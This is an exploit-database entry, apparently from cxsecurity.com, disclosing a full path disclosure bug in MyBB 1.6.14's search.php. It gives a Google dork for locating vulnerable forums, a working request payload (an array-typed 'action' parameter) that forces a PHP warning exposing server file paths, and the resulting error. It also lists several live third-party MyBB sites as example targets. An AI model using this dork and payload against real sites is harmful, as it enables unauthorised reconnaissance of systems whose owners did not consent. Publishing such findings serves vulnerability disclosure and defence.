MyBB 1.6.14 search.php Full Path Disclosure *youtube

2014-07-28 / 2014-08-05
Credit: DemoLisH
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: MyBB 1.6.14 - search.php Bug # Google Dork: inurl:"search.php" intext:"Powered By MyBB" # Date: 26.07.2014 # Author: DemoLisH # Vendor Homepage: http://www.mybb.com/ # Software Link: http://www.mybb.com/downloads # Version: 1.6.14 - Latest Version # Contact: onur@b3yaz.org *************************************************** [~#~] Exploit: search.php?action[$victor]=getdaily [~#~] Demo: http://community.mybb.com/search.php?action[$victor]=getdaily [~#~] Error: Warning [2] Illegal offset type in isset or empty - Line: 239 - File: global.php PHP 5.4.28-1~dotdeb.1 (Linux) [~#~] Example: http://my-bb.ir/search.php?action[$victor]=getdaily http://www.mybb.fr/search.php?action[$victor]=getdaily http://community.mybb.vn/search.php?action[$victor]=getdaily http://destek.mybb.com.tr/search.php?action[$victor]=getdaily http://www.mybb.biz/search.php?action[$victor]=getdaily *************************************************** [~#~] Thanks To: ynR !, T3kfurD4GLı, X-X-X, PoseidonKairos, Mugair and all TurkeySecurity.Org & B3yaz.Org Members.

References:

https://www.youtube.com/watch?v=BZaROE73OtI


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top